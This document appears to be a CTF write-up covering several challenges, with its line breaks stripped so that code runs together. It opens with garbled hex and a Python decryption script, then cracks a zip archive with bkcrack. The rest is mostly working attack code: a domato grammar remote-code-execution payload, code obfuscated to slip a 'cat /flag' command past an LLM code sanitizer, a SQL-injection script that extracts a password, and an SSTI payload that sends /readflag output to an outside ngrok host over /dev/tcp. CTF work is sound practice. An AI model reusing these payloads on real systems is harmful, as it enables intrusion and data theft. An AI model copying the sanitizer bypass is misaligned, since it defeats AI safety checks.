82bfd7148ca3f1be527c458799953e2bb386d0bc34b84213395fc7629de10f089069d3419f777e2902f1798e08b5a60967fbf0c7c887739ccf1e7917d63da143331680e6e54fa14cc52e40cd2593572e1a4e3299dde77f033f1b15a67ffa5af055dded247c9b460b10e910205a09670020770abdecf0ebdcd2ff5ba8c53ed126ef8cca36b67e81e21150c341bb74d1ffa03bb9c25186960220c1898d7fe7e43a9d37be2bfabb56702709b779d2b52040de60b1fdd70702e2203e7e95441e6a87574e53ee9f7152725139d1dec444a929dd2b634eccca94d9978781b997878929d992cfefd0c782178b6788c03a3882762b1770c737878f6d27878fd784c787878787899787878f003787878788d1c85006ef378fd0663861c53658778997380fd78787380fd7878929d992cfefdca7821787878d20e127234eccca94d9978781b9978786a784c787878787878787878f003c9737878f50afb53f11cee02143feb01006ef378fdadc2511c53658778997380fd78787380fd7878929df328787878782c782c78f2787878b22878787878p = {97: b'0', 220: b'2', 203: b':', 45: b'S', 86: b'r', 176: b'1', 18: b'6', 64: b'4', 73: b'8', 29: b"'", 193: b'/', 26: b'3', 75: b'M', 53: b'-', 213: b'F', 90: b'I', 146: b'P', 84: b'O', 62: b'9', 35: b'5', 63: b'z', 47: b'H', 245: b'D', 137: b'G', 46: b'C', 224: b'L', 134: b'j', 136: b'W', 103: b'"', 157: b'K', 88: b'J', 207: b'q', 206: b'R'} #dict()p[0xf3] = b'x05'p[0x99] = b'x01'p[0x78] = b'x00'p[0xa9] = b'x1f'p[0xb5] = b'x40'p[0xd8] = b'xc0'p[0x96] = b'xa8'p[0x2f] = b'x48'p[0x89] = b'G'p[0x62] = b'E'p[0x6e] = b'T'p[0x30] = b' 'p[0xc1] = b'/'p[0x2f] = b'H'p[0x92] = b'P'p[0xb0] = b'1'p[0x14] = b'.'p[0x56] = b'r'p[0xca] = b'n'p[0x0a] = b'o'p[0x45] = b's'p[0x02] = b't'p[0xcb] = b':'p[0xa5] = b'9'p[0xdc] = b'2'p[0x12] = b'6'p[0x49] = b'8'p[0x23] = b'5'p[0x3e] = b'7'p[0x1a] = b'3'p[0x61] = b'0'p[0x00] = b'U'p[0x1c] = b'e'p[0xc7] = b'r'p[0x35] = b'-'p[0xbf] = b'A'p[0xab] = b'g'p[0xee] = b'n'p[0x88] = b'W'p[0xfb] = b'c'p[0x01] = b'p'p[0xc4] = b'*'p[0xf4] = b'd'p[0xeb] = b'i'p[0x85] = b'y'p[0x2e] = b'C'p[0x3f] = b'z'p[0x2d] = b'S'p[0x8d] = b'k'p[0x9d] = b'K'p[0x5c] = b'l'p[0x0e] = b'v'p[0xc9] = b'a'p[0xf1] = b'm'p[0x27] = b'h'p[0x13] = b','p[0x48] = b'f'p[0xb2] = b'b'p[0x53] = b'u'p[0xdb] = b'w'p[0x65] = b'x'print(len(p.keys()))table= bytes.maketrans(bytes(p.keys()), b''.join(p.values()))s1 = bytes.fromhex("89626e30c12d1cfbc71c02143feb01302f6e6e92c1b014b056ca2f0a4502cb30b0a5dc14b012491423143edccb4961616156ca00451cc735bfab1cee02cb3088ab1c02c1b014dcb014dc56cabffbfb1c0102cb30c4c1c456cabffbfb1c01023562eefb0af4ebeeabcb30ebf41cee02eb028556ca2e0aeeee1cfb02eb0aeecb309d1c1c0135bf5ceb0e1c56ca56ca")s2 = bytes.fromhex("89626e30c18d1c85302f6e6e92c1b014b056ca2f0a4502cb30b0a5dc14b012491423143edccb4961616156ca00451cc735bfab1cee02cb3088ab1c02c1b014dcb014dc56cabffbfb1c0102cb30c4c1c456cabffbfb1c01023562eefb0af4ebeeabcb30ebf41cee02eb028556ca2e0aeeee1cfb02eb0aeecb309d1c1c0135bf5ceb0e1c56ca56ca")s3 = bytes.fromhex("2f6e6e92c1b0146130dc616130549d56ca2d1cc70e1cc7cb302debf1015c1c2f6e6e92c161141230928502270aeec11a14b0b0144056caf5c9021ccb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb6149cbb04030894b6e56ca2e0aee021cee02350285011ccb30c901015cebfbc902eb0aeec165353feb0135fb0af101c71c45451cf456ca2e0aee021cee0235e01ceeab0227cb30b049b0b056cae0c94502354b0af4eb48eb1cf4cb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb61dccb402330894b6e56ca56ca929dfd730c782178b6788c03a3882762b1770c737878f6d27878fd7831788d1c85006e2178fd0663861cde87511c53658778997380fd78787380fd7878c8524bc242d998f92257047fbb8a07ac3da6b336f7837fe5d5e0c53a89f7c457c2ddc33cde6adafb3d5bc5c949683c96bea74610aa0276c1fa9f9ce1b69727d6e6ed5fd5e267f295b4af74ab369edc08faeb0cac7ccc5b19fd449ee7d10b68961ddcc00ce5e5a51c5fa3c2e8b2b57cc14b58680c23813fc0af4e104f784fe3680e1845358fa437e319ffafd5b1c58c4c362cc47d81c1b641966d9f91ca046e0e840e8502676c19f0800af3575e4ad87c85f8b46db979def11fe3c5fb8353d02a6561f2eba6a88e1acaafafa2acaff3fe02470764e6d39d13c7c1dc3929488ed2c17073a2a8ddd4e8983337d2de677f776667255da1c4047f85f456528e3584806562109a5861fa7df9fa71b52e099b42ddae7028400be81e8a3590ea351aea962b54e5b34941157e13c35924962983e09904393c800777b9a00d440530fc18c23760484d226318fc18fd455387caa04f3a967f12d73d3a17fe71fc339135ef91aab6d4d6d66e232d6d0db57f7725614a7beaa09a6a7736f831b881a3683156af1cc3a66edffa8894f6eabeb612acda5c35edc30172c198b10a7398f26d90c21952dd57c76672948ec60e1bed7a1c39e00a4b43c39a8a13b2740468c408d1ea5bd4bba07fff051917fb9d40af6bcb751b1b446d8a40b249a9b06b3ef7cddb403ebfaf93b7bc55bc6118aa86bed9f8d76d0da7f87aeb5ab6989bc46139ef23e12e1a6a6f2beac87eceabb1188d05bbd07c89f7d0d756e576065229f6b323afa7558ad7ada6b10f0330fdc881c96c05d48b79cfff764e9997e63409728655c6930c8798f41d5afe3688f8afa93d9290a3ccc75fd8137172d1d09db126a2790ef5b3ea4abc9547038c80d07c97f25b1b870a3e21d55b3e13e46f0099362ab0618b1aa44992f78f0e3489dd8bd07f02bc43fd1f3f5eecc9b7c9baf528fb9f81f69cf07b16b3faace38e26ff4ae0892562a61b49d63baa9c7c966340ec495d2ae13c7fc2fad2be8c20826e261cefa0fc7e521614e3b6c6a08c2aa0dbec3e1e0c3f7345df4d8ea504dae31d9c1c647fcfcef9806d083d1e53daf48b11c32117ad12c553b73e881a908d51b70dc7b3c5fffd736f10b3f9a990a1a4f8ca616f3fcdee8c673a03c71a0a269aefeded61c35b4a486c81e00c29d02e1f971fe2fefefc481366020d04f461999ef0518b2ab1be4f27889fbc0569d6365c9d5d9c374139e838857dd3ef11ad832532d078c80b4d90a8ddc6cd2cfe063f3251a72e504c483c1252e37046b3bda8d059e4e925c4faf1c1407bebf4fb1d648f7bfec9e1de6f0ea47f4069ba698490730a4c1dbcb1880b642e04270943e910c9eef2228107d6bb0de62f0c583f97d87c47270af6c5e949f6a0ecf1b5762f04f6c15fa4319060a16354ebbbdf7636ea8c549a1aee48203f24750b1613e0f32df9dcb232daad983af107688cbbcf7aa7236c8a32e0dbbad29a9f6a057ba7929dd2b62762b1770c737878f6d27878929dfd73ca7821787878d20e127234eccca94d9978781b9978786a783178f50afb53f11cee02143feb01006e2178fdadc2511c16c2511c53658778997380fd78787380fd7878456530d171a51949f4b77d010bb1e0763bc1d39e10506a01ca5d608cad2515ae4a1808cc282c7af12f1e5311f7241283a22026927fe18e166e7393f3ac2262b652314b5934553470682a0960c4df34074e4e778cda9e678c4f901e4eddf37f0fe8fd4c2bcbd4ac2cfad985a16722da0f2c7d2515e4f1db9bd4732080278f3439a54c84ead6b8d83abf5df17eb82f2f00ac7869df1242806dbba05a37f2fce744e4dd2011d8457f7d8f07cc302c897f468bc9f2c271e837cf0e134f6cd43bc6b308325f2aaac89c98f1729e05473a14483277390d2834592acac276f3b82bfd7148ca3f1be527c458799953e2bb386d0bc34b84213395fc7629de10f089069d3419f777e2902f1798e08b5a60967fbf0c7c887739ccf1e7917d63da143331680e6e54fa14cc52e40cd2593572e1a4e3299dde77f033f1b15a67ffa5af055dded247c9b460b10e910205a09670020770abdecf0ebdcd2ff5ba8c53ed126ef8cca36b67e81e21150c341bb74d1ffa03bb9c25186960220c1898d7fe7e43a9d37be2bfabb56702709b779d2b52040de60b1fdd70702e2203e7e95441e6a87574e53ee9f7152725139d1dec444a929dd2b634eccca94d9978781b997878929d992cfefd0c782178b6788c03a3882762b1770c737878f6d27878fd784c787878787899787878f003787878788d1c85006ef378fd0663861c53658778997380fd78787380fd7878929d992cfefdca7821787878d20e127234eccca94d9978781b9978786a784c787878787878787878f003c9737878f50afb53f11cee02143feb01006ef378fdadc2511c53658778997380fd78787380fd7878929df328787878782c782c78f2787878b22878787878")s4 = bytes.fromhex("2f6e6e92c1b0146130dc616130549d56ca2d1cc70e1cc7cb302debf1015c1c2f6e6e92c161141230928502270aeec11a14b0b0144056caf5c9021ccb304b0aee1330dcdc3058c9ee30dc61dc4030613ecb6149cbb01230894b6e56ca2e0aee021cee02350285011ccb30c901015cebfbc902eb0aeec10afb021c02354502c71cc9f156ca2e0aee021cee0235e01ceeab0227cb30dc61614956cae0c94502354b0af4eb48eb1cf4cb302dc902133061dc30f51cfb30dc61dc1a306149cb2312cb61b030894b6e56ca56ca54eefb1c3053010aee30c93002ebf11c30ebee3002271c30cf53c9ebee0230020adbee300a48302d1cc71ceeeb028530d5c95c5c45133002271cc71c305ceb0e1cf430c930850a53eeab30fb0af10153021cc730db27eb3f30eec9f11cf430bf5c1c651430bf5c1c6530dbc945308dee0adbee30480ac73002271cebc7301c65fb1c0102eb0aeec95c30458deb5c5c4530ebee3027c9fb8debeeab30c9eef430fb0af4ebeeab1330b253023002271c8530c95cdbc985453053451cf43002271cebc73002c95c1cee024530480ac730ab0a0af414306e271c30020adbee45011c0a015c1c30c9f4f1ebc71cf430bf5c1c651d4530c9b2eb5ceb028530020a3053eefb0a0e1cc73002271c3002c753022730c9eef430b2c7ebeeab3086534502ebfb1c30020a3002270a451c30db270a30ee1c1cf41cf430eb0214caca54ee1c30f4c9851330c930f18545021cc7eb0a534530f11c4545c9ab1c30c901011cc9c71cf4300aee30bf5c1c651d4530fb0af10153021cc73045fbc71c1cee14305a0230dbc94530c9ee30c9ee0aee85f10a53453002eb0130c9b20a530230c930ee1c48c9c7eb0a534530015c0a0230020a3045c9b20a02c9ab1c3002271c30020adbee1d4530010adb1cc730abc7ebf414305aee02c7ebab531cf430c9eef430f41c021cc7f1ebee1cf430020a3001c70a021cfb02302d1cc71ceeeb028530d5c95c5c451330bf5c1c6530f41c5c0e1cf430ebee020a3002271c30f4ebabeb02c95c30c71cc95cf1133002c7c9fbebeeab3002271c300ac7ebabebee45300a483002271c30f11c4545c9ab1c14cacabf4530bf5c1c653053eec7c90e1c5c1cf43002271c305cc9851cc745300a483002271c300eebc70253c95c3001533f3f5c1c133002271c8530f4eb45fb0a0e1cc71cf430c930fb0af1015c1c6530ee1c02db0ac78d300a4830fb85b21cc7fbc7ebf1ebeec95c4530dbeb022730015cc9ee4530020a30015c53eeab1c3002271c301cee02ebc71c30020adbee30ebee020a30f4c9c78dee1c454514306e271c30fb5c0afb8d30dbc9453002ebfb8debeeab1330c9eef430bf5c1c6530ee1c1cf41cf430020a30c9fb023045dbeb48025c85143088eb0227301cc9fb27308d1c854502c70a8d1c133002271c8530011cee1c02c7c9021cf43048ebc71cdbc95c5c4530c9eef430b28501c945451cf4301ceefbc78501021cf430b2c9c7c7eb1cc7451330f41c021cc7f1ebee1cf430020a300227dbc9c7023002271c30ebf1011ceef4ebeeab30f4eb45c945021cc714caca6e271c3002c7c9eb5c305c1cf430bf5c1c6530020a30c9ee30c9b2c9eef40aee1cf430dbc9c71c270a53451c300aee3002271c300a5302458debc70245300a4830020adbee1430bfc7f11cf430dbeb02273002271cebc7305cc901020a0130c9eef430c930451cee451c300a48300153c7010a451c1330bf5c1c6530fbc95302eb0a53455c85301cee021cc71cf43002271c30f4c9c78d1cee1cf430b253eb5cf4ebeeab14305aee3002271c30271cc9c702300a483002271c30dbc9c71c270a53451c133002271c8530480a53eef430c930c70a0af13048eb5c5c1cf430dbeb022730451cc70e1cc74530c9eef430c930abc70a5301300a48304527c9f40adb853048ebab53c71c45302753f4f45c1cf430c9c70a53eef43045fbc71c1cee4514caca88eb022730c930485c0a53c7eb4527300a48308d1c854502c70a8d1c451330bf5c1c6530f4eb45c9b25c1cf43002271c30f1c95cebfbeb0a534530fb0af41c30c9eef43001c71c0e1cee021cf43002271c30ebf1011ceef4ebeeab30fbc902c94502c70a01271c14306e271c30fbc7ebf1ebeec95c4530db1cc71c30c90101c71c271ceef41cf41330c9eef43002271c30020adbee300a48302d1cc71ceeeb028530d5c95c5c4530dbc9453045c9481c300aeefb1c30f10ac71c14cacabf453002271c30c95302270ac7eb02eb1c4530c9c7c7eb0e1cf430020a3002c98d1c3002271c30fbc7ebf1ebeec95c4530ebee020a30fb5345020af4851330bf5c1c6530fb0a535cf4ee1d0230271c5c0130b2530230c71c485c1cfb02300aee3002271c30ebf1010ac702c9eefb1c300a4830fb85b21cc7451cfb53c7eb028514306e53c7eeebeeab30020a3002271c30abc902271cc71cf430fbc70adbf41330bf5c1c6530c7c9eb451cf43002271cebc7300e0aebfb1c30c9eef430f41cfb5cc9c71cf41330675aee30c930db0ac75cf430db271cc71c30f4ebabeb02c95c300227c71cc90245305c53c78d30ebee3002271c304527c9f40adb451330db1c30f153450230c71cf1c9ebee300eebabeb5cc9ee021430ce1cf11cf1b21cc7133002271c3001c94545db0ac7f430eb45303ef4f423fb61401248f4b2493e1248121a23b048401c61401c49b2401ac9dc6114302d02c9853045c9481c13302d1cc71ceeeb028530d5c95c5c451330c9eef4305c1c021d4530b253eb5cf430c930451cfb53c71c3048530253c71c30020aab1c02271cc71467cacabfeef430dbeb02273002270a451c30db0ac7f4451330bf5c1c6530b21cfbc9f11c30c9305c0afbc95c30271cc70a1330ee0a02308653450230480ac73002271cebc730021cfb27eeebfbc95c3001c70adb1c45451330b2530230480ac73002271cebc73053eedbc90e1cc7ebeeab30fb0af1f1eb02f11cee0230020a3045c9481cab53c9c7f4ebeeab3002271c30f4ebabeb02c95c30c71cc95cf130c9eef43002271c30fb0af1f153eeeb02853002271c8530fbc95c5c1cf430270af11c14ca")#print(s1.translate(table))#print(s2.translate(table))imp = s3.translate(table)#print(s4.translate(table))zipdata = open("C:\users\dev\DesktopSecret.zip", "rb").read()correct_ = zipdata#orig_ = imp[206:]orig_ = s3[206:]for a, b in zip(orig_, correct_):p[a] = bytes([b])table= bytes.maketrans(bytes(p.keys()), b''.join(p.values()))print(len(p.keys()))print(len(p.values()))assert s3.translate(table)[206:] == zipdataprint(table)#print(s4.translate(table))passs = bytes.fromhex("7dd5c046fdb876f6351f4e04e8b43a20")#print(passs.translate(table))#print(p)print(s1.translate(table).decode())print(s2.translate(table).decode())#imp = s3.translate(table)print(s3.translate(table))print(s4.translate(table).decode())
Decrypted traffic
GET /Secret.zip HTTP/1.1Host: 192.168.5.72:8000User-Agent: Wget/1.21.2Accept: */*Accept-Encoding: identityConnection: Keep-Aliveb'HTTP/1.0 200 OKrnServer: SimpleHTTP/0.6 Python/3.11.4rnDate: Mon, 22 Jan 2024 07:08:14 GMTrnContent-type: application/x-zip-compressedrnContent-Length: 1811rnLast-Modified: Mon, 22 Jan 2024 07:02:45 GMTrnrnPKx03x04x14x00tx00x08x00xdbx81x82WhEx16x89x14x04x00x00xd8x07x00x00x03x00x1cx00keyUTtx00x03~xe7jexfex0bxaeeuxx0bx00x01x04xe8x03x00x00x04xe8x03x00x00x84x92Mx0fx9exd2xb0&xc6xc2x94xb5x93xd3{x98xcdxc3xa3xddxc7Qxb5%FLxe3`Gxc7*xc2x0fxb8xa2xf3xfex0cx1bcxcdx8exe3a8xbaxf3xa8xfdxb3xcex8a]tx17/|x97xd1xa7x08x85h^Bx11xa6Fx86"x9bxb9xf9xda[gxdd=2<|ix14x98x0ex9ax8ex99x03x91=xf7xacxd4xbaxa8'2x80x14%%9exa6x82x0fxe0b@x0e/MJxbax145xeczx80xdaxfax8axf0x00xf0x7fxbavxefs-xc8+xf1x7fx99xbbxdaFx16xe3xdbx18xddx02*x95xec/x08x88xa8?x97xdcnx94Tvxb7vyt"xcax99xb4xe8ox05xc2Vxe9xc0x0eyxe2xf9?xc5xa1xfemx9cx7fxe3cQuxfc}x0x9bixc3xcfxd03nxdaxdaxeax98xdax05x1etxf6{x96Bxd6K,r/2xdfNfxd0x07/_x04xeaxcfxb8xf4xe0xb0!xf1x07xfe"xb5x89xbe"x8bxe6Y*x94xb5ydrx92xd0-xb7xe8xEx8a>J0|x95&|x83@Cx19xe4x9exb8(_x064xd4xe0x87xd3-xd9xd7-3xd7xa8x1aO%xa38x88\x90,xa2xa9x8cxa8NQLx01x94xdfxf3xe8{x89xc5x12xedx91x9d x8fxefx0fxf1xebfxabxc6xe7xefx8fxefx03sux0bnx12xf0`xa8xb56xf5xcd`x15x1ex83x8f!xdc-xa0xdc]x08xf4^^T5S?xed@xb5x89x8b0xe9#xd7x12>x0cx89xddxe2x1cxa5xecx82xbax1crxdaexa2xc3Txcb|Wx8dxd8xd7xfdx086x98x1bl-x11xa2pX/xb0x16ox04xb0x9b?xd9x0fx99x92xb8xc2rxbeXx8dxd0xb1vx9fx11xb6exdfLoMxe5xa2>xd3,b[x94xba*<xacxd7x8exf4x93x12xb5xbbx9dx99x15cK4xdaxf2:xaax9fx9fx91?xd34b8x1f1xf27xc7xbcw47Axdaxa4xc1;Z;0xef]jxfdxd2xe2xf5?xedxb3xe2xb6iIx08xb0xe4*0xdfxa05xa7C3x0c)x1axd7x84x90Rgx16xefkx9dx93xfcx0eGxc7xfcxf5r%x17~x92Nxd8xa35xdaxb3Zxd3xf5xadxc3x16xeex81 x03x84xecaxcax9dxf4xccxa1qxbbx17xfax01x85Bxffx19XjZxb1xa4x14x0bxb0d'Ix1exddWxe2xdax1fxcdPxd9x82x9arxa6xc0,x83XxacxfcKx16x1dxeaxa1vDxa3xd7xe9;xb9xf6x81xdbxe8xfcx0ex85x9bx8ex9fx0bo7tFx8e7,xc9)Ux01xdd}10xcc3+8Pxc7xc8vxffGxb8xccxfcxb5t;xe5x03x9czV$axc1axbdDx06cx97xecxd8xd1xb4#xc4xa3|x98x7fxd0x1dxbbxe9LGx8bExc3x9f8^xde]xd1x0exa8xe74$8xe6}xa7xf3xb5x0f|x07xfdxdbxf8xbfTx1dexa0x12x8fx90x92xc4.x7fx08xb1x12xdb}x12w$7x87x14zx04sxcbxabxd09x94x1bx7f'xd1ex96xb5qR&xe8?<xcdx87ux1bdxccxfbxa2tx15xad6xe3uxc17W3xd9kxaexc1xedrxa3xe3xbbx03x04)x8axa3&x1fxd9Y+xe2n0)zxbcnxdb"`x81r3ox1d>xa0x11x110xa2x8exe9fxcaxecLx14NxfcCx9cx85x9cx86x1ex1ex8ff,xbetxedx94d0x01=xb4xaexcc}x16xfdxf0hWx97;x9dxe1^xddlKxe6xd1xf1x88xdfxe0xb2yx95xd6xa0xfbxadQx8bx13xfcx00x84xd4xabxd9xcfxb8xb1xbcx02x1e~zx13xaexb3Cxd5x18fxf36x92x7f_xcexa3xafxcfxfcxa9xc9x10x8b*|m/4#idc'x96xc8#x1eaxa7xfe)v+xb54xe1xbdxe1xb7xd9x04ox18';x16Wxd4x96Cx94hx19xe5x10x8aanx9bxc6xec{^x93xedBHx14Jzx85xc0x0exf6hoxd8xe3x108xd8x12$m@x17Hx94xd8/xa6+x1cxd9xebYxe7Oix93xcbx17xddxd7xdbO>3nfxf8zx8cxaaxd4xc4,Lx05S&2bx13x1bxadxb0`m{xbaxdbx93qxb6xb35xcaxd3x13Lwxbdx07>x97x0cx9d#xb3PKx07x08hEx16x89x14x04x00x00xd8x07x00x00PKx03x04nx00tx00x00x00x07v6Xxff$x9ax1fxabx01x00x00x9fx01x00x00x0cx00x1cx00Document.zipUTtx00x03xadx0fxaeexc4x0fxaeeuxx0bx00x01x04xe8x03x00x00x04xe8x03x00x00sx xacx839x998dxc1x95pxd4x16Lx17xde/xd6=x8axd5x0cpnxe6xebxdbxadx8b\(xe9xef<x9ax06x02xb6mHx87uxfbxc7x8c6Qxeaxf8x1dPxb5xa7xd0xc4Tx04xa4x05x98xc6Ex08x92x1cMxa9xffZxff_xba}x19xeb*xcbxff{xfaxfax89xdbx1b="xdbxf0xd9x87xfaxb8x05xb5xeexe0x03x18x1a:xf4x98x02|xd2yY"xc6x1bxeex02x95x8b\xc9mwxe4xf4x04xf8xe8hxc8xffxdf9x18xb7xd7^xa5xc0`Axe6mx90xa5HHUx98x00xe1xcb6x9exe8?x93x12Ixf1x9bx8fxf7x91xc9xb8xf8xfbxc0sxb5x95xc8{x9a x02Gxb5xcexccax9bx0fx83xe0xf1qv,xf0xcaxf4xdexb1xa3<x13xa6}]x84xd1xb0mX=x9dxf6`.fx13x89xdfxedx06xffxa9}nx0fx17x05xa5x1ax03x83fnzx9f%h*Jxa1x01ux86x93xb2?xd4xa2Mxb7t!xb9x8fx17Nxfex8axb4G~Kxffx99xc7x89x86xd9Hx15xb0LxccIxebxa8xb5Ax14x0eWx89xdfx9amxf7xdcx95xe7x1b.!x1cxbavTO|.x9ax92xc9x14x07xa9-Xxa7+x7fNKxfex89xb4!mx16I"xbb9xdax9dxe6xfex07xf6axf9xebx16vxdctx9dx12xa8_t{_gxfeqvxafxbcHDxbdxdbux116Txe2x9ax82xf2"xe0x87t\x14xffx9fxc1xabx9c|x81x93xd1x8bxefxe1xebxc6x14xefxb0xf5x1ex90xe5x1fxd6#x86Ag@"t_xe4x89Kx1ax92x94xedBxd4x9cxb8__Cxc6x81xf7x10Ox88Bxcfxaa[%7x10xc7\hx8b,K'$x91xe9PKx07x08xff$x9ax1fxabx01x00x00x9fx01x00x00PKx01x02x1ex03x14x00tx00x08x00xdbx81x82WhEx16x89x14x04x00x00xd8x07x00x00x03x00x18x00x00x00x00x00x01x00x00x00xb4x81x00x00x00x00keyUTx05x00x03~xe7jeuxx0bx00x01x04xe8x03x00x00x04xe8x03x00x00PKx01x02x1ex03nx00tx00x00x00x07v6Xxff$x9ax1fxabx01x00x00x9fx01x00x00x0cx00x18x00x00x00x00x00x00x00x00x00xb4x81ax04x00x00Document.zipUTx05x00x03xadx0fxaeeuxx0bx00x01x04xe8x03x00x00x04xe8x03x00x00PKx05x06x00x00x00x00x02x00x02x00x9bx00x00x00bx06x00x00x00x00'
GET /key HTTP/1.1Host: 192.168.5.72:8000User-Agent: Wget/1.21.2Accept: */*Accept-Encoding: identityConnection: Keep-AliveHTTP/1.0 200 OKServer: SimpleHTTP/0.6 Python/3.11.4Date: Mon, 22 Jan 2024 07:08:16 GMTContent-type: application/octet-streamContent-Length: 2008Last-Modified: Sat, 02 Dec 2023 08:56:01 GMTOnce upon a time in the quaint town of Serenity Falls, there lived a young computer whiz named Alex. Alex was known for their exceptional skills in hacking and coding, but they always used their talents for good. The townspeople admired Alex's ability to uncover the truth and bring justice to those who needed it.One day, a mysterious message appeared on Alex's computer screen. It was an anonymous tip about a nefarious plot to sabotage the town's power grid. Intrigued and determined to protect Serenity Falls, Alex delved into the digital realm, tracing the origins of the message.As Alex unraveled the layers of the virtual puzzle, they discovered a complex network of cybercriminals with plans to plunge the entire town into darkness. The clock was ticking, and Alex needed to act swiftly. With each keystroke, they penetrated firewalls and bypassed encrypted barriers, determined to thwart the impending disaster.The trail led Alex to an abandoned warehouse on the outskirts of town. Armed with their laptop and a sense of purpose, Alex cautiously entered the darkened building. In the heart of the warehouse, they found a room filled with servers and a group of shadowy figures huddled around screens.With a flourish of keystrokes, Alex disabled the malicious code and prevented the impending catastrophe. The criminals were apprehended, and the town of Serenity Falls was safe once more.As the authorities arrived to take the criminals into custody, Alex couldn't help but reflect on the importance of cybersecurity. Turning to the gathered crowd, Alex raised their voice and declared, "In a world where digital threats lurk in the shadows, we must remain vigilant. Remember, the password is 7dd5c046fdb876f6351f4e04e8b43a20. Stay safe, Serenity Falls, and let's build a secure future together."And with those words, Alex became a local hero, not just for their technical prowess, but for their unwavering commitment to safeguarding the digital realm and the community they called home.
Since we have the known plaintext of key inside the password-protected Secret.zip, we can try the bkcrack known-plaintext zip attack to unzip Secret.zip.
bkcrack
The decrypted text from earlier is around 2k bytes long, which suggests that Secret.zip/key may be the deflated version of the text. We can re-compress key using zip -6 keyenc.zip key to obtain the (non-encrypted but) deflated version of key, then feed that into bkcrack to solve for Secret.zip’s cipher keys.
sy @ syvapor-el ~/c/r/truthplain % bkcrack -C Secret.zip -c key -p plain2.binbkcrack 1.6.0 - 2024-01-02[04:12:39] Z reduction using 28 bytes of known plaintext100.0 % (28 / 28)[04:12:40] Attack on 256485 Z values at index 6Keys: 368b7c25 d8b6163f d5c85e0b13.0 % (33322 / 256485)Found a solution. Stopping.You may resume the attack with the option: --continue-attack 33322[04:13:10] Keys368b7c25 d8b6163f d5c85e0b
Next, inflate Document.zip with the brute forced keys.
sy @ syvapor-el ~/c/r/truthplain % bkcrack -C Secret.zip -c Document.zip -k 368b7c25 d8b6163f d5c85e0b -d Document.zipbkcrack 1.6.0 - 2024-01-02[04:13:58] Writing deciphered data Document.zip (maybe compressed)Wrote deciphered data.
Finally, we can use the shorter password decrypted earlier in /key (7dd5c046fdb876f6351f4e04e8b43a20) to decrypt the flag text file in Document.zip
MISC
YouKnowHowToFuzz
Looking at the documentation I found that ‘domato’ supports calling python code in grammar.
https://github.com/googleprojectzero/domato?tab=readme-ov-file#including-python-code
Send exp and get the flag.
!begin function catflagimport osos.system('cat flag_*')!end function!begin lines<call function=catflag>!end lines<EOF>
rwctf{it_is_a_boring_chall_about_domato_rce_20240126rwctf}LLM sanitizer
The idea of this challenge is to get code to run while bypassing an LLM that sanitize our code.
This was trivially done by sending it the following code:
import ossuper_secure = ossuper_secure_2 = super_securegood_safe_text = " tac"[::-1]safest_file = "galf/"[::-1]safe_function = super_secure_2.systemsafe_function(good_safe_text + safest_file)
This runs os.sytem("cat /flag"). Admittedly by using words like safe/good/secure and separating each steps into multiple, the LLM gets lost and ends up not sanitizing anything, assuming it is safe.
That code was then sent to the remote with the following script:
from pwn import *import subprocessdef solve_pow(challenge):command = f"bash -c "python3 <(curl -sSL https://goo.gle/kctf-pow) solve {challenge}""process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)stdout, stderr = process.communicate()if process.returncode != 0:print("Error solving PoW:")print(stderr.decode())return Nonereturn stdoutdef main():host, port = "47.89.192.246", 1337io = remote(host, port)io.recvuntil(b"pow) solve ")challenge = io.recvline().decode().strip()print("Challenge received:", challenge)solution = solve_pow(challenge)print("PoW Solution:", solution)io.sendline(solution)with open('test.py', 'r') as file:content = file.read()io.send(content)io.shutdown('send') # sends EOFio.interactive()if __name__ == "__main__":main()
WEB
ChatterBox
We can use functions inside WHERE statement to trigger an error (https://github.com/alibaba/druid/issues/5449) when parsing the query, and then have an oracle to exfil the user password:
import requestsimport stringtarget = 'http://127.0.0.1:8080'session = requests.Session()session.proxies.update({'http': 'http://127.0.0.1:8081'})session.get(target)jsessionid = session.cookies.get('JSESSIONID')password = ""while True:found = Falsefor char in string.printable:res = session.post('%s/login;jsessionid=%s' % (target, jsessionid), data={'username': ("""'||substr(ltrim(array_to_string(array[$$ USER_DEFINE $$||'%s'=$$ USER_DEFINE $$||substr(passwd,%d,1),1=2],'1',''),'f'),1,1)::integer||'""" % (char, len(password) + 1)).strip(),'passwd': '1',})if "DataIntegrityViolationException" in res.text:password += charfound = Truebreakprint(password)if not found:break
Then, we can use the NotifyController /notify?fname=... endpoint to load our template if we have file write due to being normalized as /, thus allowing us to escape from the /non_exists/ dir wherever we want to. We can achieve file write by doing a request with a file upload, which will write the payload into /tmp/tomcat.8080/[...]. But the file has unique name, so instead we will hang the upload so that there’s a reference to our file in /proc/[pid]/fd/[fd], allowing us to just spray the correct (pid, fd).
The SSTI payload we use can be generated with the following script:
with open('payload', 'w') as fout:fout.write("""__${#c=''.getClass()}__::.x__${#iu=#c.forName('org' + '.apache.tomcat.util.IntrospectionUtils')}__::.x__${#cu=#c.forName('com.fasterxml.jackson.databind.util.ClassUtil')}__::.x__${#rt=#c.forName('java.lang.Runtime')}__::.x__${#al=#c.forName('java.util.ArrayList')}__::.x__${#el=#al.newInstance()}__::.x__${#obj=#c.forName('java.lang.Object')}__::.x__${#obja=#el.toArray().getClass()}__::.x__${#tgtmthd=#cu.getDeclaredMethods(#rt)[0]}__::.x__${#tp=#al.newInstance()}__::.x__${#tp.add(#obj)}__::.x__${#tp.add(#obja)}__::.x__${#tp=#tp.toArray()}__::.x__${#mp=#al.newInstance()}__::.x__${#mp=#mp.toArray()}__::.x__${#p=#al.newInstance()}__::.x__${#p.add(null)}__::.x__${#p.add(#mp)}__::.x__${#p=#p.toArray()}__::.x__${#runtime=#iu.callMethodN(#tgtmthd, "invoke", #p, #tp)}__::.x__${#tgtmthd=#cu.getDeclaredMethods(#runtime.getClass())[11]}__::.x__${#mp=#al.newInstance()}__::.x__${#mp.add(#strings.arraySplit("/bin/bash;-c;echo -n 'L3JlYWRmbGFnID4gL2Rldi90Y3AvNi50Y3Aubmdyb2suaW8vMTkxODU'|base64 -d|bash",";"))}__::.x__${#mp=#mp.toArray()}__::.x__${#p=#al.newInstance()}__::.x__${#p.add(#runtime)}__::.x__${#p.add(#mp)}__::.x__${#p=#p.toArray()}__::.x__${#iu.callMethodN(#tgtmthd, "invoke", #p, #tp)}__::.y""")fout.write("A"*1024*128)
Then, we use a valid JSESSIONID and hang our upload with the following command:
